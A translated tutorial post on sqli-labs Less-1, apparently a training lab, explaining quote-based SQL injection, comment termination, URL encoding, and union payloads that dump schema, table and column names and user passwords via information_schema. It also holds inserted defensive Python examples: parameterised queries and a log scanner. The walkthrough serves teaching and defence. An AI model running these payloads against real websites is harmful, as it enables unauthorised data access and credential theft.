sqli-labs: Less-1 (character injection)

Foreword

Starting from this article, we will begin explaining the various injections in sqli-labs in earnest. We start with the first level; follow-up content will be released in turn. Your attention and comments are welcome!

Less-1

First, open the home page and enter the first level:


You can see the prompt, which asks us to pass in a parameter named id and tells us it should be a numeric value, so I pass in this parameter to see what happens:



At this point we can see that the SQL statement executed in the background appears to query according to the incoming parameter id, so I can look at what is in the database of the environment we built:

From here we can determine that the SQL statement executed by PHP queries the database for the user whose id equals the id we passed in, and displays the username and password obtained from the database. We can guess that the SQL statement has one of the following structures:

select username,password from users where id=$_GET[id]
or:
select username,password from users where id="$_GET[id]"
select username,password from users where id='$_GET[id]'

The data listed here can be queried, so if we want to attack this website we need to guess how this page's SQL statement is written, i.e. which of the above cases it belongs to. Only then can we carefully construct our own SQL statements to obtain the information we want, perform insert, delete, update and select operations on the database, or use the database software to read or write files on the server, and so on.

Let's make a simple attempt.

The level states that the parameter id we pass in must be an integer, so we can pass in a non-integer to see what happens:


We enter a single quote (') here as a simple test:


We find that when we enter ', an error occurs, and the error content is:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

From the content of the error we can see that it has revealed part of the SQL statement:

'1'' LIMIT 0,1'

The 1' here is the parameter we passed in, so we can refine the earlier guess: the parameter 1' we entered is enclosed in single quotes, and the query result is limited afterwards so that only one row is returned:

select username,password  from users where id='$_GET[id]' limit 0,1

Then, after we pass in the malformed parameter above, the concatenated SQL statement is:

select  username,password from users where id='1'' limit 0,1

In the MySQL terminal, if the single quote we enter is not matched, the MySQL client keeps waiting for the user to close the single quote, for example:

When the statement is executed, the server considers it an incorrect SQL statement and returns an error message. Having understood this basic principle, what we need to do now is either close the single quote or comment out the trailing single quote so that the SQL statement can execute normally.

The comments are:

Single-line comment: -- (MySQL also accepts #, used below)
Multi-line comment: /**/

Note that the single-line comment here is two "-" characters, and there must be a space after the "--"!

Now let's think about what the SQL statement looks like once we add a comment:

select username,password from users where id='1'-- ' limit 0,1

or

select username,password from users where id='1' # ' limit 0,1

Let's do a small test to see:



From the result above we can see that the statement executes normally, which means the rest of the backend SQL statement has been commented out.
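To make the mechanism above concrete from the defender's side, here is an added example (not code from the original post or from sqli-labs) that rebuilds the query the way the page reconstructs it, using an in-memory SQLite table with constructed sample rows as a stand-in for the MySQL users table. It runs the page's own inputs (1, 1' and 1'-- ) through the string-concatenated query and through a hardened version that enforces the integer contract and binds the value as a parameter. The table contents and function names are assumptions for this example.

```python
import re
import sqlite3

# Constructed stand-in for the sqli-labs users table (sample rows, not the real data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INT, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")],
    )
    return conn

def vulnerable_lookup(conn, user_input):
    # The pattern the page reconstructs: the raw parameter is pasted between single quotes.
    # A stray quote breaks the syntax, and a trailing comment discards "' LIMIT 0,1".
    sql = f"SELECT username, password FROM users WHERE id='{user_input}' LIMIT 0,1"
    return conn.execute(sql).fetchone()

INTEGER_RE = re.compile(r"-?\d+")

def safe_lookup(conn, user_input):
    # Mitigation 1: the level says id must be an integer, so reject anything else up front.
    if not INTEGER_RE.fullmatch(user_input):
        return None
    # Mitigation 2: bind the value as a parameter; the driver never splices it into the SQL text.
    sql = "SELECT username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (int(user_input),)).fetchone()

def classify(conn, user_input):
    """Run both variants and report what each did: 'row', 'none' or 'error'."""
    try:
        vuln = "row" if vulnerable_lookup(conn, user_input) else "none"
    except sqlite3.OperationalError:
        vuln = "error"  # the unmatched quote makes the statement unparsable
    safe = "row" if safe_lookup(conn, user_input) else "none"
    return vuln, safe

if __name__ == "__main__":
    db = make_db()
    for value in ["1", "1'", "1'-- "]:
        print(repr(value), classify(db, value))
```

The concatenated version returns a row for 1, errors on 1' (the behaviour the page's error message shows) and happily returns a row for 1'-- because the comment swallows the rest of the statement; the parameterised version returns the same row for 1 and simply finds nothing for the other two, since they never reach the SQL parser as syntax.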

Important points:

1. Why --+ instead of --?

The characters - and + have fixed meanings in a URL: + represents a space in URL encoding, while - does not need to be encoded.

2. Why isn't --+ URL-encoded?

Since we use + to stand for the space, no further encoding is needed. We could also URL-encode the space directly instead of using +, in which case the encoded URL would be:
http://127.0.0.1/Less-1/?id=1%27--%20

3. Why must # be encoded? Can it be left unencoded?

No. # has a fixed meaning in a URL: it marks an anchor in the page. If it is not encoded, the browser treats it as the page anchor rather than as data, but here we need it transmitted to the server as data, so URL encoding is required.

4. Why not use a multi-line comment to comment out the rest of the statement?

Because the format of a multi-line comment is:

/*Comment content*/

A multi-line comment needs a marker both before and after the commented content, but here we control only one position in the SQL statement (where the id is inserted), so a correct multi-line comment cannot be constructed and it cannot be used!
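The four points above all concern how the payload looks once the URL is decoded, which is also exactly what a defender should look at. The following added example (not code from the original post) decodes the id parameter from constructed Apache-style access log lines, handling the --+, %20 and %23 encodings the page discusses, and flags any request whose id is not the integer the level demands. The log lines, timestamps and function names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access log lines (sample data, not from the original page).
SAMPLE_LOG_LINES = [
    '127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 714',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-1/?id=1%27 HTTP/1.1" 200 782',
    '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-1/?id=1%27--+ HTTP/1.1" 200 714',
    '127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /Less-1/?id=1%27%23 HTTP/1.1" 200 714',
    '127.0.0.1 - - [01/Jan/2024:10:00:20 +0000] "GET /Less-1/?id=-1 HTTP/1.1" 200 620',
    '127.0.0.1 - - [01/Jan/2024:10:00:25 +0000] "GET /index.html HTTP/1.1" 200 1200',
]

# Pull the request target out of a combined-format log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# The contract the level states: id is an integer (a leading minus is still an integer).
INTEGER_RE = re.compile(r"-?\d+")

def decode_id(request_target):
    """Return the decoded id parameter, or None if the request has no id."""
    query = urlsplit(request_target).query
    # parse_qs percent-decodes and turns '+' into a space, mirroring what the server sees.
    values = parse_qs(query, keep_blank_values=True).get("id")
    return values[0] if values else None

def is_malformed_id(value):
    """True when an id was supplied but is not a plain integer."""
    return value is not None and INTEGER_RE.fullmatch(value) is None

def scan_log(lines):
    """Return the decoded id values of every request that violates the integer contract."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        raw_id = decode_id(match.group(1))
        if is_malformed_id(raw_id):
            findings.append(raw_id)
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print("non-integer id parameter:", repr(finding))
```

Decoding before matching matters: a check that only looks for a literal quote in the raw URL would miss %27, and one that looks for "-- " would miss --+, whereas the decoded values show the quote, the comment and the # uniformly. Note the page's own point 3 in the output: an unencoded # would never have reached the server, so only the %23 form appears in a log.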

Next, we use this injection to query the data stored in the database step by step!

Guess the number of fields



From the echo above we can tell that the number of fields in this query is 3.

The union query concept:

Here we will use a union query. A union query combines the results of two SQL statements; the number of selected columns in the SQL statements before and after union must be the same. With union, if the first SELECT returns no rows, the final output consists of the second SELECT's rows, which is very important for our injection.
In everyday use, union all is also common; the difference between the two is whether duplicate rows are removed.

Determine the echo positions (union is used from here on)


Dump the database names

According to our earlier speculation, the SQL statement submitted to the backend here should follow this pattern:

SELECT * FROM users WHERE id='-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+ LIMIT 0,1

Dump the table names in the security database

The backend SQL statement at this point should be:

SELECT * FROM users WHERE id='-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ LIMIT 0,1

Dump the column names in the users table

At this point, the SQL statement executed in the backend should be:

SELECT * FROM users WHERE id='-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ LIMIT 0,1

Dump the field data

At this point, the backend SQL statement should be:

SELECT * FROM users WHERE id='-1'union select 1,username,password from users where id=3--+ LIMIT 0,1

Many people may wonder: is there any difference between this and the start? If I simply change the value of the id parameter at the beginning, can't I also get other rows? Why go through all this? If you think so, you have overlooked that before, you could only query the fixed database, table and fields chosen by the page, whereas now you can modify the query and read information from the other databases on the system!

At this point, the introduction of Less-1 is over!

Summary: Less-1 mainly covers how to construct SQL injection statements and the process of manually injecting a MySQL database. The idea here is very important!

Origin http://43.154.161.224:23101/article/api/json?id=326397108&siteId=291194637